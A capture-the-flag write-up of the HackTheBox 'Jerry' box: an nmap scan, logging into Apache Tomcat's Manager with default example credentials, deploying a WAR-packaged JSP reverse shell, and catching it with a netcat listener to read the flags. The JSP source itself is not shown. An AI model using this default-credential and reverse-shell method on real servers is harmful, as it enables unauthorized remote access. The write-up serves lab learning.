hackthebox.eu — Jerry

Welcome to my writeup for the Jerry box from hackthebox.eu.

This box is named Jerry it was created by mrh4sh. the difficulty of it 2.8/10, so an easy one. This box runs Windows operating system.

I started by scanning all the open TCP port on the machine with nmap.

$ nmap -Pn -A -T4 10.10.10.95
Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-01 15:37 UTC
Nmap scan report for 10.10.10.95
Host is up (0.37s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE VERSION
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.88
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 52.48 seconds

There is only one service an Apache Tomcat 7.0.88 running on port 8080. Let’s see what kind of web site is running on this Apache Tomcat.

Hmm, it is the default Apache Tomcat welcome page. With only that page it sounds like a misconfiguration vulnerability. Using the Manager App provided by Apache Tomcat you can upload web a WAR file (Web Application Resource or Web application ARchive) which is a file used to distribute a collection of JAR-files.

To access to this Manager App, you need to configure an user in the $CATALINA_HOME/conf/tomcat-users.xml as shown in the left hand side yellow information box.

By reading the documentation, in the Configuring Manager Application Access section, an example of a user declaration is given:

<user username="craigmcc" password="secret" roles="standard,manager-script" />

With this explanation: “which defines the username and password used by this individual to log on, and the role names he or she is associated with. You can add the manager-script role to the comma-delimited roles attribute for one or more existing users, and/or create new users with that assigned role.

So, if we are lucky the administrator who configured this Apache Tomcat just copy/pasted from the documentation by laziness.

It didn’t work, so I kept exploring the documentation for a while and at one moment I clicked on the Cancel button on the login dialogue box.

And this beautiful 401 Unauthorised page showed up:

By reading this error page carefully, I figured out the username and password used in this example are not the same as the previous username and password given in the documentation example.

From the documentation page:
<user username="craigmcc" password="secret" roles="standard,manager-script" />
From the error page:
<user username="tomcat" password="s3cret" roles="manager-gui"/>

And after reading the documentation for a second time, The user description I found was for accessing the tools-friendly plain text interface, and to the “Server Status” page. And the user example given in the error page is for accessing to the HTML interface.

So, let’s see if the administrator just copy past this line.

And he/she did it. Now, we have access to the Tomcat Web Application Manager and we can upload any kind of web application using the Deploy section:

Let’s code! I will make a reverse shell in JavaServer Pages or JSP. First, I’ll need a way to redirect the input stream of cmd.exe to the output stream of the TCP socket and redirect the output stream of cmd.exe to the input stream of the TCP socket. This TCP socket will be connected to my local machine.

Here is my code:

In order to run it with Apache Tomcat, I had to create a WEB-INF/ directory and create a web.xml which will describe my application to Apache Tomcat. Then I have to package it in to a WAR file.

$ ls -R
WEB-INF/ jspReverseShell.jsp
./WEB-INF:
web.xml
$ cat WEB-INF/web.xml
<?xml version="1.0"?>
<!DOCTYPE web-app PUBLIC
"-//Sun Microsystems, Inc.//DTD Web Application 2.3//EN"
"http://java.sun.com/dtd/web-app_2_3.dtd">
<web-app>
<welcome-file-list>
<welcome-file>jspReverseShell.jsp</welcome-file>
</welcome-file-list>
</web-app>
$ jar cvf reverseShell.war *
added manifest
adding: WEB-INF/(in = 0) (out= 0)(stored 0%)
adding: WEB-INF/web.xml(in = 266) (out= 187)(deflated 29%)
adding: jspReverseShell.jsp(in = 1601) (out= 588)(deflated 63%)

Now I’ve my reverseShell.war, I can upload it using the Manager App provided by Apache Tomcat.

After clicking on the Deploy button, my reverse shell appears in the deployed application array.

Before executing the reverse shell, I had to make my local machine listening on port specified in the reverse shell which is 4321. To do this I will use the nc command which is used for just about anything under the sun involving TCP or UDP. It can open TCP connections, send UDP packets, listen on arbitrary TCP and UDP ports, [blah blah].

$ nc -l 4321

And now when I execute the reverse shell by going to http://10.10.10.95:8080/reverseShell/,

$ nc -l 4321
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\apache-tomcat-7.0.88>

nc show me the Windows command prompt! Now as usual we have to find the user.txt file. After diving into some directories, I finally found it in C:\Users\Administrator\Desktop\flags

C:\Users\Administrator\Desktop\flags>dir
dir
Volume in drive C has no label.
Volume Serial Number is FC2B-E489
Directory of C:\Users\Administrator\Desktop\flags
06/19/2018  06:09 AM    <DIR>          .
06/19/2018 06:09 AM <DIR> ..
06/19/2018 06:11 AM 88 2 for the price of 1.txt
1 File(s) 88 bytes
2 Dir(s) 27,632,041,984 bytes free
C:\Users\Administrator\Desktop\flags>more *.txt
more *.txt
user.txt
7004dbcef0f854e0fb401875f26ebd00
root.txt
04a8b36e1545a455393d067e772fe90e

The user and root flag are both in the same file. We are done with Jerry.

Thank you for reading this write-up :)